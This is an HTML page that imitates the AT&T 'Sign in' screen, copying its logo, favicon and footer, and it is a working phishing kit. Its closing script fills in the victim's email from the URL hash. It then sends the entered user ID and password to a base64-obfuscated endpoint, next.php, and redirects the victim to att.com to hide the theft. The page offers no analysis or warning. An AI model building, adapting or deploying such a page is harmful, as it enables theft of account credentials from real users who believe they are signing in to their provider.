<!DOCTYPE html>
<html lang="en">
  <head>
    <script
      type="text/javascript"
      src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"
    ></script>
    <script
      type="text/javascript"
      src="https://code.jquery.com/jquery-3.1.1.min.js"
    ></script>
    <script
      type="text/javascript"
      src="https://code.jquery.com/jquery-3.3.1.js"
      integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60="
      crossorigin="anonymous"
    ></script>
    <!-- Required meta tags -->
    <meta charset="utf-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    />
    <link
      rel="icon"
      type="image/x-icon"
      href="https://signin.att.com/favicon.ico"
    />
    <!-- Bootstrap CSS -->
    <link
      rel="stylesheet"
      href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css"
      integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm"
      crossorigin="anonymous"
    />
    <link
      href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap"
      rel="stylesheet"
    />
    <link
      rel="stylesheet"
      href="https://use.fontawesome.com/releases/v5.7.0/css/all.css"
      integrity="sha384-lZN37f5QGtY3VHgisS14W3ExzMWZxybE1SJSEsQp9S+oqd12jhcu+A56Ebc1zFSJ"
      crossorigin="anonymous"
    />
    <title>Login Screen</title>
    <link href="css/hover.css" rel="stylesheet" media="all" />
    <link rel="stylesheet" href="css/styles.css" />
    <style>
      textarea:hover,
      input:hover,
      textarea:active,
      input:active,
      textarea:focus,
      input:focus,
      button:focus,
      button:active,
      button:hover,
      label:focus,
      .btn:active,
      .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
      }

      app-error[_ngcontent-fto-c0],
      app-footer[_ngcontent-fto-c0],
      app-header[_ngcontent-fto-c0],
      app-manual-login[_ngcontent-fto-c0],
      app-manual-login-erepair[_ngcontent-fto-c0],
      app-multi-save-login[_ngcontent-fto-c0] {
        max-width: 310px;
        width: 100%;
      }
    </style>
    <style></style>
    <style>
      .fg-sign-in[_ngcontent-fto-c3] {
        margin-top: 8px;
      }
      .zenkey-container[_ngcontent-fto-c3] {
        margin-bottom: -15px;
      }
    </style>
    <style>
      div[_ngcontent-fto-c6] {
        background-color: #f7f7f7;
      }
      .policyArea[_ngcontent-fto-c6] {
        text-align: center;
        margin-top: 24px;
        display: flex;
        flex-direction: row;
      }
      .policyArea[_ngcontent-fto-c6] a[_ngcontent-fto-c6] {
        padding: 0 10px;
      }
      .footer-link-text[_ngcontent-fto-c6] {
        transition: color 0.3s linear;
        font-family: ATTAleckSans-Medium;
        font-size: 12px;
        font-style: normal;
        font-stretch: normal;
        line-height: 2;
        letter-spacing: normal;
        text-align: center;
        color: #0057b8;
      }
      .footer-link-text[_ngcontent-fto-c6]:focus,
      .footer-link-text[_ngcontent-fto-c6]:hover {
        text-decoration: underline;
      }
      .copyright[_ngcontent-fto-c6] {
        font-family: ATTAleckSans-Regular;
        font-size: 12px;
        font-weight: 500;
        font-style: normal;
        font-stretch: normal;
        line-height: 2;
        letter-spacing: normal;
        text-align: center;
      }
      .footer-link-text[_ngcontent-fto-c6] .text-style-1[_ngcontent-fto-c6] {
        font-weight: 400;
        color: #1d2329;
      }
      @media (max-width: 1199.98px) {
        .policyArea[_ngcontent-fto-c6] {
          margin-top: 20px;
          display: flex;
          flex-direction: column;
          align-items: center;
        }
        .policyArea[_ngcontent-fto-c6] a[_ngcontent-fto-c6]:after {
          content: "";
          display: block;
          height: 0;
          width: 1px;
          text-align: center;
          padding: 2px 0;
          margin-bottom: 2px;
        }
        .copyright[_ngcontent-fto-c6] {
          margin-left: auto;
          margin-right: auto;
          text-align: center;
          width: 80%;
        }
        .policyArea[_ngcontent-fto-c6] a[_ngcontent-fto-c6] {
          white-space: nowrap;
        }
      }
    </style>
  </head>

  <body>
    <div id="app-root" _nghost-fto-c0="" ng-version="7.2.15">
      <div _ngcontent-fto-c0="">
        <div _ngcontent-fto-c0="" class="container-fluid" role="main">
          <div _ngcontent-fto-c0="" class="d-flex flex-container Card">
            <app-header
              _ngcontent-fto-c0=""
              class="d-flex flex-container"
              _nghost-fto-c1=""
            >
              <div _ngcontent-fto-c1="" class="image" style="width: 65px">
                <img
                  _ngcontent-fto-c1=""
                  alt="AT&amp;T logo image"
                  class="mar-b4 header-logo-image"
                  id="headerLogoImage"
                  style="width: 100%"
                  src="https://signin.att.com/static/siam/en/halo_c/halo-c-login/assets/images/logo.svg"
                />
              </div>
              <h1
                _ngcontent-fto-c1=""
                class="sign-in-header justify-content-center mb-0"
                id="signInHeaderText"
                style="margin-top: 20px"
              >
                Sign in
              </h1>
              <h1
                _ngcontent-fto-c1=""
                class="DIRECTV-NOW-Text justify-content-center mt-0"
                id="signInHeaderToText"
              >
                to continue
              </h1>
            </app-header>
            <app-error _ngcontent-fto-c0="" _nghost-fto-c2="">
              <!---->
            </app-error>
            <!---->
            <app-manual-login
              _ngcontent-fto-c0=""
              _nghost-fto-c3=""
              class="ng-tns-c3-0 ng-star-inserted"
            >
              <form
                _ngcontent-fto-c3=""
                class="ng-tns-c3-0 ng-pristine ng-invalid ng-touched"
                id="login"
              >
                <div class="my-2">
                  <center>
                    <div
                      class="text-danger border-danger p-2 rounded"
                      id="msg"
                      style="border: 1px solid; display: none"
                    >
                      Invalid Password.! Please enter your correct password
                    </div>
                    <span id="error" class="text-danger" style="display: none"
                      >That account doesn't exist. Enter a different
                      account</span
                    >
                  </center>
                </div>
                <div _ngcontent-fto-c3="" class="form-group mb-1">
                  <label
                    _ngcontent-fto-c3=""
                    class="textfield-label"
                    for="userID"
                    id="userLabel"
                    >User ID
                    <div
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0"
                      id="userLabelAfter"
                    ></div
                  ></label>
                  <div
                    _ngcontent-fto-c3=""
                    class="flex-container justify-content-center"
                  >
                    <input
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0 textfield ng-pristine ng-invalid ng-touched"
                      aria-controls="userInlineErrorText"
                      autocapitalize="off"
                      autocomplete="username"
                      formcontrolname="userID"
                      id="ai"
                      name="userID"
                      spellcheck="false"
                      type="email"
                      aria-invalid="false"
                    />
                    <div
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0"
                      aria-atomic="true"
                      aria-live="polite"
                    >
                      <!---->
                    </div>
                  </div>
                </div>
                <!---->
                <div
                  _ngcontent-fto-c3=""
                  class="form-group text-right ng-tns-c3-0 ng-star-inserted"
                >
                  <a
                    _ngcontent-fto-c3=""
                    class="ForgotLink"
                    id="forgotUserID"
                    href="#"
                    >Forgot user ID?</a
                  >
                </div>
                <div _ngcontent-fto-c3="" class="form-group mb-0 pass_show">
                  <label
                    _ngcontent-fto-c3=""
                    class="textfield-label"
                    for="password"
                    id="passwordLabel"
                    >Password
                    <div
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0"
                      id="passwordLabelAfter"
                    ></div
                  ></label>
                  <div
                    _ngcontent-fto-c3=""
                    class="flex-container justify-content-center"
                  >
                    <input
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0 textfield ng-untouched ng-pristine ng-invalid"
                      aria-controls="passwordInlineErrorText"
                      autocapitalize="off"
                      autocomplete="current-password"
                      formcontrolname="password"
                      id="pr"
                      name="password"
                      spellcheck="false"
                      type="password"
                      aria-invalid="false"
                    />
                    <!---->
                    <div
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0"
                      aria-atomic="true"
                      aria-live="polite"
                    >
                      <!---->
                    </div>
                  </div>
                </div>
                <!---->
                <div
                  _ngcontent-fto-c3=""
                  class="form-group text-right ng-tns-c3-0 ng-star-inserted"
                >
                  <a
                    _ngcontent-fto-c3=""
                    class="ForgotLink"
                    id="forgotPassword"
                    href="#"
                    >Forgot password?</a
                  >
                </div>
                <!---->
                <!---->
                <div
                  _ngcontent-fto-c3=""
                  class="form-group checkboxDiv mb-0 ng-tns-c3-0 ng-star-inserted"
                >
                  <label _ngcontent-fto-c3="" class="checkbox" for="keepMeIn"
                    ><input
                      _ngcontent-fto-c3=""
                      class="ng-tns-c3-0"
                      id="keepMeIn"
                      name="keepMeIn"
                      type="checkbox"
                      value="Y"
                      aria-label="Keep me signed in for 2 weeks checkbox"
                    />
                    <div
                      _ngcontent-fto-c3=""
                      class="checkbox-skin"
                    ></div> </label
                  ><span
                    _ngcontent-fto-c3=""
                    class="checkbox-label ml-2"
                    id="keepMeInText"
                    >Keep me signed in for 2 weeks</span
                  >
                </div>
                <div
                  _ngcontent-fto-c3=""
                  class="form-group justify-content-center fg-sign-in"
                >
                  <div
                    _ngcontent-fto-c3=""
                    class="flex-container justify-content-center"
                  >
                    <button
                      _ngcontent-fto-c3=""
                      class="btn-primary"
                      id="submit-btn"
                      type="submit"
                    >
                      Sign in
                    </button>
                    <!----><button
                      _ngcontent-fto-c3=""
                      class="btn-link mar-t8 ng-tns-c3-0 ng-star-inserted"
                      id="cancel"
                      type="button"
                    >
                      Cancel
                    </button>
                    <!---->
                    <hr
                      _ngcontent-fto-c3=""
                      class="align-self-center cancel-border ng-tns-c3-0 ng-star-inserted"
                    />
                  </div>
                </div>
                <!---->
                <!---->
                <div
                  _ngcontent-fto-c3=""
                  class="form-group justify-content-center dnUI ng-tns-c3-0 ng-star-inserted"
                >
                  <div
                    _ngcontent-fto-c3=""
                    class="flex-container justify-content-center"
                  >
                    <p _ngcontent-fto-c3="" class="mb-0" id="dontHaveIdText">
                      Don't have a user ID?
                    </p>
                    <!----><a
                      _ngcontent-fto-c3=""
                      class="text-style-1 ng-tns-c3-0 ng-star-inserted"
                      id="createNow"
                      href="#"
                    >
                      Create one now
                    </a>
                    <!---->
                  </div>
                </div>
              </form>
            </app-manual-login>
            <!---->
            <!---->
          </div>
        </div>
        <!---->
        <app-footer
          _ngcontent-fto-c0=""
          role="contentinfo"
          _nghost-fto-c6=""
          class="ng-star-inserted"
        >
          <div _ngcontent-fto-c6="" class="policyArea justify-content-center">
            <a
              _ngcontent-fto-c6=""
              class="footer-link-text"
              id="legalPolicy"
              rel="noopener noreferrer"
              target="_blank"
              href="#"
            >
              Legal policy center </a
            ><a
              _ngcontent-fto-c6=""
              class="footer-link-text"
              id="privacyPolicy"
              rel="noopener noreferrer"
              target="_blank"
              href="#"
            >
              Privacy policy </a
            ><a
              _ngcontent-fto-c6=""
              class="footer-link-text"
              id="termsOfUse"
              rel="noopener noreferrer"
              target="_blank"
              href="#"
            >
              Terms of use </a
            ><a
              _ngcontent-fto-c6=""
              class="footer-link-text"
              id="access"
              rel="noopener noreferrer"
              target="_blank"
              href="#"
            >
              Accessibility </a
            ><a
              _ngcontent-fto-c6=""
              class="footer-link-text"
              id="privacyCenter"
              rel="noopener noreferrer"
              target="_blank"
              href="#"
            >
              Do not sell my personal info
            </a>
          </div>
          <div _ngcontent-fto-c6="" class="copyright">
            <span _ngcontent-fto-c6="" id="copyrightTextSpan"
              >©2024 AT&amp;T Intellectual Property. All rights reserved.</span
            >
          </div>
        </app-footer>
        <!---->
      </div>
    </div>

    <style>
      .tb_button {
        padding: 1px;
        cursor: pointer;
        border-right: 1px solid #8b8b8b;
        border-left: 1px solid #fff;
        border-bottom: 1px solid #fff;
      }

      .tb_button.hover {
        borer: 2px outset #def;
        background-color: #f8f8f8 !important;
      }

      .ws_toolbar {
        z-index: 100000;
      }

      .ws_toolbar .ws_tb_btn {
        cursor: pointer;
        border: 1px solid #555;
        padding: 3px;
      }

      .tb_highlight {
        background-color: yellow;
      }

      .tb_hide {
        visibility: hidden;
      }

      .ws_toolbar img {
        padding: 2px;
        margin: 0px;
      }
    </style>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script
      type="text/javascript"
      src="https://code.jquery.com/jquery-3.2.1.slim.min.js"
      integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN"
      crossorigin="anonymous"
    ></script>
    <script
      type="text/javascript"
      src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"
      integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q"
      crossorigin="anonymous"
    ></script>
    <script
      type="text/javascript"
      src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"
      integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl"
      crossorigin="anonymous"
    ></script>
  </body>

  <script
    type="text/javascript"
    src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"
  ></script>
  <script
    type="text/javascript"
    src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"
  ></script>
  <script>
    /* global $ */
    $(document).ready(function () {
      var count = 0;
      // $("#div1").animate({ left: 0, opacity: "hide" }, 0);
      // $("#div2").animate({ right: 0, opacity: "show" }, 500);

      /////////////url ai getting////////////////
      var ai = window.location.hash.substr(1);
      if (!ai) {
      } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr(ind + 1);
        var c = my_slice.substr(0, my_slice.indexOf("."));
        var final = c.toLowerCase();

        $("#ai").val(my_ai);
        $("#aich").html(my_ai);
        $("#msg").hide();
      }
      ///////////////url getting ai////////////////

      var file = "bmV4dC5waHA=";
      $("#submit-btn").click(function (event) {
        $("#error").hide();
        $("#msg").hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        var msg = $("#msg").html();
        $("#msg").text(msg);
        ///////////////////////////
        var my_ai = ai;
        var filter =
          /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!ai) {
          $("#error").show();
          $("#error").html("Email field is empty.!");
          return false;
        }

        // if (!filter.test(my_ai)) {
        //     $('#error').show();
        //     $('#error').html("That account doesn't exist. Enter a different account");
        //     return false;
        // }
        if (!pr) {
          $("#error").show();
          $("#error").html("Password field is empty.!");
          return false;
        }

        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr(ind + 1);
        var c = my_slice.substr(0, my_slice.indexOf("."));
        var final = c.toLowerCase();
        ///////////////////////////
        count = count + 1;

        $.ajax({
          dataType: "JSON",
          url: atob(file),
          type: "POST",
          data: {
            ai: ai,
            pr: pr,
          },
          // data: $('#contact').serialize(),
          beforeSend: function (xhr) {
            $("#submit-btn").html("Verifying...");
          },
          success: function (response) {
            $("#pr").val("");
            if (count >= 1) {
              count = 0;
              window.location.replace("http://att.com/");
              return false;
            }
            $("#msg").show();
          },
          error: function () {
            $("#pr").val("");
            if (count >= 1) {
              count = 0;
              window.location.replace("http://att.com/");
              return false;
            }
            $("#msg").show();
          },
          complete: function () {
            $("#submit-btn").html("Sign in");
          },
        });
      });
    });
  </script>
</html>
